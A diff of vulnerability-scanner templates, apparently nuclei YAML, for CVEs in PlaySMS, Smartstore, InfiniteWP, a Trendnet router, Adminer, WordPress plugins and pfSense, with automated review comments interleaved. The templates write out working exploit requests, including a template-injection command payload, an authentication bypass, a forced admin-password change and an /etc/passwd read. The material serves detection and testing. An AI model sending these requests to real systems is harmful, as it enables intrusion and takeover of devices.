@@ -1,43 +1,31 @@ id: CVE-2020-36365 info: - name: Smartstore <4.1.0 - Open Redirect + name: Smartstore < 4.1.0 - Open redirect author: 0x_Akoko severity: medium - description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. + description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 + - https://www.cvedetails.com/cve/CVE-2020-36365 - https://github.com/smartstore/SmartStoreNET - - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-36365 cwe-id: CWE-601 - epss-score: 0.00244 - epss-percentile: 0.62379 - cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: smartstore - product: smartstorenet shodan-query: http.html:'content="Smartstore' - tags: cve2020,cve,redirect,smartstore + tags: cve,cve2020,redirect,smartstore -http: +requests: - method: GET + path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' matchers: - type: regex part: header regex: - - 
'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2020-8644.yaml b/poc/cve/cve-2020-8644.yaml index aae9417521..6d66fa8fa8 100644 --- a/poc/cve/cve-2020-8644.yaml +++ b/poc/cve/cve-2020-8644.yaml 
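Review bot: The reference list now swaps the NVD entry (`- https://nvd.nist.gov/vuln/detail/CVE-2020-36365`) for a cvedetails mirror, yet NVD is the authoritative source for the cve-id and the CVSS vector retained under `classification`; the same swap is made for CVE-2020-18268 at L152, and the NVD link is dropped outright for CVE-2021-25074 at L171–L172. Keep the NVD URL in each list alongside the vendor issue link. Writing the score as `6.10` instead of `6.1` is numerically harmless but inconsistent with the `7.5` and `9.8` left in other new-side files in this same commit; `cvss-score: 6.1` is the conventional one-decimal form.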
@@ -5,36 +5,24 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. - impact: | - Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. - remediation: | - Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html - - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-94 - epss-score: 0.96028 - epss-percentile: 0.99356 - cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: playsms - product: playsms - tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce + cwe-id: CWE-74 + tags: cve,cve2020,ssti,playsms,rce,unauth,kev -http: +requests: - raw: - | GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -43,11 +31,21 @@ http: X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= + cookie-reuse: true host-redirects: true max-redirects: 2 + extractors: + - type: xpath + name: csrf + part: body + attribute: value + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: + - type: word part: body words: 
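Review bot: The weakness class moves from `cwe-id: CWE-94` to `cwe-id: CWE-74` with no corresponding change to the description, which still describes a server-side template being processed twice and leading to remote code execution; CWE-94 (code injection) is the specific class for template injection that executes code and CWE-74 is its generic parent. Check which one the NVD entry records and keep that rather than toggling between them. The `http`/`requests` section started here continues into the next hunk.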
@@ -57,12 +55,4 @@ http: status: - 200 - extractors: - - type: xpath - name: csrf - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input - attribute: value - part: body -# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/07/07 \ No newline at end of file diff --git a/poc/cve/cve-2020-8772.yaml b/poc/cve/cve-2020-8772.yaml index beccc40018..0036ff439d 100644 --- a/poc/cve/cve-2020-8772.yaml +++ b/poc/cve/cve-2020-8772.yaml 
@@ -1,83 +1,19 @@ id: CVE-2020-8772 info: - name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass - author: princechaddha,scent2d + name: InfiniteWP Improper Authentication + author: medbsq severity: critical - description: | - WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can gain unauthorized administrative access to the WordPress site. - remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. - reference: - - https://wpscan.com/vulnerability/10011 - - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - - https://wpvulndb.com/vulnerabilities/10011 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 - - https://github.com/ChoiSG/vwp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8772 - cwe-id: CWE-862 - epss-score: 0.96607 - epss-percentile: 0.99546 - cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* - metadata: - verified: true - max-request: 2 - vendor: revmakx - product: infinitewp_client - framework: wordpress - tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx -http: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} - 
- host-redirects: true - - matchers-condition: and +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==" matchers: - type: word - part: header words: - - "wordpress_logged_in" - - - type: word - part: body - words: - - "" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: username - group: 1 - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?' - part: body -# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/05 diff --git a/poc/cve/cve-2021-20158.yaml b/poc/cve/cve-2021-20158.yaml index 41df85c9ff..cea4234f03 100644 --- a/poc/cve/cve-2021-20158.yaml +++ b/poc/cve/cve-2021-20158.yaml 
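Review bot: The new `info` block keeps only name, author and severity — the description, reference list and the whole `classification` (cve-id, cwe-id, CVSS) are on the removed side with nothing replacing them, so the template no longer states which CVE it covers except through its filename. At minimum carry `cve-id: CVE-2020-8772` under `classification:` plus one reference. The new request also appears to embed a fixed account name inside the base64 body instead of extracting it from `/?author=1` as the removed version did, so it only demonstrates the issue when that specific account exists; if the narrowing is intentional, a comment saying so would help. In the collapsed view the new word matcher's `words:` list shows no entries — confirm it has at least one, since an empty list can never match.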
@@ -1,49 +1,41 @@ id: CVE-2021-20158 info: - name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change + name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. - impact: | - An attacker with authenticated access can gain unauthorized control over the affected device. - remediation: | - Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-20158 - cwe-id: CWE-306 - epss-score: 0.01211 - epss-percentile: 0.83754 - cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* + cwe-id: CWE-287 metadata: - max-request: 2 - vendor: trendnet - product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" - tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet -variables: - password: "{{rand_base(6)}}" + tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos -http: +requests: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}} + ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= + 
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word part: body words: @@ -58,7 +50,4 @@ http: words: - "text/html" - - type: status - status: - - 200 -# digest: 4a0a00473045022026f2cb4d546143dddc1646a081ebfaeecf087f82b9adc26ae239313b24dc4a4d0221008e2cbba77ac00dde9277de789229bd07830e4a7b7c25c58778ac3c9b1ddeddb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by cs on 2022/02/25 diff --git a/poc/cve/cve-2021-21311.yaml b/poc/cve/cve-2021-21311.yaml index deec236dce..fc48ecd2fb 100644 --- a/poc/cve/cve-2021-21311.yaml +++ b/poc/cve/cve-2021-21311.yaml 
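Review bot: Replacing `variables: password: "{{rand_base(6)}}"` with the literal `admin_password=nuclei` (and its base64 form in the second request) leaves every device this intrusive template touches with the same publicly known admin password, whereas the removed random value was at least unique per run; keep the variable and reference it with `{{password}}` / `{{base64(password)}}`. The reference `https://nvd.nist.gov/vuln/detail/CVE-2021-20150` does not match `cve-id: CVE-2021-20158` on the new side and looks like a typo to confirm. The newly added `dos` tag has no basis in the description, which describes a forced password change rather than denial of service; if it was added because a scan can lock operators out, say so in a comment next to the tag.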
@@ -1,69 +1,34 @@ id: CVE-2021-21311 info: - name: Adminer <4.7.9 - Server-Side Request Forgery - author: Adam Crosser,pwnhxl + name: Adminer SSRF Using Verbose Error Messages + author: Adam Crosser severity: high - description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. - remediation: Upgrade to version 4.7.9 or later. + description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9. 
reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - - https://packagist.org/packages/vrana/adminer - - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 - - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 + metadata: + shodan-query: title:"Login - Adminer" + tags: cve,cve2021,adminer,ssrf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-score: 7.20 cve-id: CVE-2021-21311 cwe-id: CWE-918 - epss-score: 0.01485 - epss-percentile: 0.85417 - cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* - metadata: - max-request: 6 - vendor: adminer - product: adminer - shodan-query: title:"Login - Adminer" - fofa-query: app="Adminer" && body="4.7.8" - hunter-query: app.name="Adminer"&&web.body="4.7.8" - tags: cve2021,cve,adminer,ssrf -http: - - raw: - - | - POST {{path}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} - - payloads: - path: - - "/index.php" - - "/adminer.php" - - "/adminer/adminer.php" - - "/adminer/index.php" - - "/_adminer.php" - - "/_adminer/index.php" - - attack: batteringram - stop-at-first-match: true - redirects: true - max-redirects: 1 +requests: + - method: GET + path: + - "{{BaseURL}}/adminer?elastic=example.com&username=" matchers-condition: and matchers: + - type: status + status: + - 403 + - type: word part: body words: - - "400 - Bad Request" - "<title>400 - Bad Request</title>" - condition: or - - - type: status - status: - - 403 -# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
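Review bot: The new request probes a single path, `{{BaseURL}}/adminer?elastic=example.com&username=`, so an Adminer deployed as `adminer.php` or `index.php` — the bundled-driver layouts the description itself names — is never exercised and is reported clean; the removed `payloads`/`batteringram` block covered six such paths. If the single-path form is intentional, state that limitation in the description so readers do not treat a non-match as proof of absence. The `fofa-query` and `hunter-query` metadata are dropped while `shodan-query` is kept, and nothing in the hunk explains the asymmetry.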
diff --git a/poc/cve/cve-2021-24926.yaml b/poc/cve/cve-2021-24926.yaml index 8e4826b49b..7a8c1e8d7d 100644 --- a/poc/cve/cve-2021-24926.yaml +++ b/poc/cve/cve-2021-24926.yaml @@ -1,33 +1,19 @@ id: CVE-2021-24926 info: - name: WordPress Domain Check <1.0.17 - Cross-Site Scripting + name: WordPress Plugin Domain Check < 1.0.17 - XSS author: cckuailong severity: medium - description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page. - remediation: | - Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability. + description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. reference: - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2021-24926 cwe-id: CWE-79 - epss-score: 0.00171 - epss-percentile: 0.53153 - cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: domaincheckplugin - product: domain_check - framework: wordpress - tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -37,10 +23,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: - type: word 
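Review bot: The new `classification` keeps cve-id and cwe-id but drops `cvss-metrics` and `cvss-score`, so the `severity: medium` in the same info block has no vector behind it; the removed `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` / `6.1` pair is the standard reflected-XSS scoring and can simply be kept. The same removal without replacement happens for CVE-2021-24947 at L169, where the severity is additionally changed.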
@@ -53,4 +41,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24947.yaml b/poc/cve/cve-2021-24947.yaml index 9796ad8438..216a1e0d5a 100644 --- a/poc/cve/cve-2021-24947.yaml +++ b/poc/cve/cve-2021-24947.yaml 
@@ -3,34 +3,17 @@ id: CVE-2021-24947 info: name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read author: cckuailong - severity: medium - description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. - impact: | - An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. - remediation: | - Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. + severity: high + description: "WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server." reference: - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/kazet/wpgarlic classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 cve-id: CVE-2021-24947 - cwe-id: CWE-352,CWE-863 - epss-score: 0.00315 - epss-percentile: 0.69672 - cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: thinkupthemes - product: responsive_vector_maps - framework: wordpress - tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes + cwe-id: CWE-23 + tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 
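Review bot: Severity is raised from medium to high while the CVSS vector that produced the old rating (`PR:L`, 6.5) is removed rather than replaced, so the new rating has no stated basis; an arbitrary file read that requires an authenticated user — which the new-side description still says — is normally scored 6.5 (medium). Either add a vector that justifies `high` or keep `severity: medium`. The cwe change from `CWE-352,CWE-863` to `CWE-23` is defensible for a path-based file read but should likewise be checked against the NVD record.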
@@ -44,6 +27,7 @@ http: GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: - type: regex @@ -53,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/cve-2021-25074.yaml b/poc/cve/cve-2021-25074.yaml index 726e7dd13e..4475b6ef96 100644 --- a/poc/cve/cve-2021-25074.yaml +++ b/poc/cve/cve-2021-25074.yaml 
@@ -1,42 +1,25 @@ id: CVE-2021-25074 info: - name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect + name: WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect author: dhiyaneshDk severity: medium - description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue. - impact: | - An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. - remediation: | - Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed. - reference: - - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25074 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/ARPSyndicate/cvemon + description: The plugin contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue. 
+ reference: https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 + tags: cve,cve2021,wordpress,redirect,wp-plugin,webpconverter classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-25074 cwe-id: CWE-601 - epss-score: 0.00106 - epss-percentile: 0.42122 - cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: webp_converter_for_media_project - product: webp_converter_for_media - framework: wordpress - tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project -http: +requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh" + - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2021-25111.yaml b/poc/cve/cve-2021-25111.yaml index 01f582930c..42b2530141 100644 --- a/poc/cve/cve-2021-25111.yaml +++ b/poc/cve/cve-2021-25111.yaml 
@@ -5,30 +5,17 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. - remediation: | - Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - https://nvd.nist.gov/vuln/detail/CVE-2021-25111 - - https://github.com/ARPSyndicate/kenzer-templates + tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-25111 cwe-id: CWE-601 - epss-score: 0.00106 - epss-percentile: 0.42122 - cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: english_wordpress_admin_project - product: english_wordpress_admin - framework: wordpress - tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project -http: +requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" 
@@ -37,5 +24,6 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by md on 2022/10/14 diff --git a/poc/cve/cve-2021-41282.yaml b/poc/cve/cve-2021-41282.yaml index 54567b4bd3..c337bf85a5 100644 --- a/poc/cve/cve-2021-41282.yaml +++ b/poc/cve/cve-2021-41282.yaml 
@@ -1,66 +1,55 @@ id: CVE-2021-41282 info: - name: pfSense - Arbitrary File Write + name: pfSense Arbitrary File Write to RCE author: cckuailong severity: high - description: | - diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall. - remediation: | - Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later. + description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. 
reference: - https://www.shielder.it/advisories/pfsense-remote-command-execution/ - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/ - - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc - https://nvd.nist.gov/vuln/detail/CVE-2021-41282 - - https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html + tags: cve,cve2021,pfsense,rce,authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2021-41282 - cwe-id: CWE-74 - epss-score: 0.97305 - epss-percentile: 0.9986 - cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* - metadata: - max-request: 4 - vendor: pfsense - product: pfsense - tags: cve2021,cve,pfsense,rce,authenticated + cwe-id: CWE-94 -http: +requests: - raw: - | GET /index.php HTTP/1.1 Host: {{Hostname}} + - | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login= + - | GET 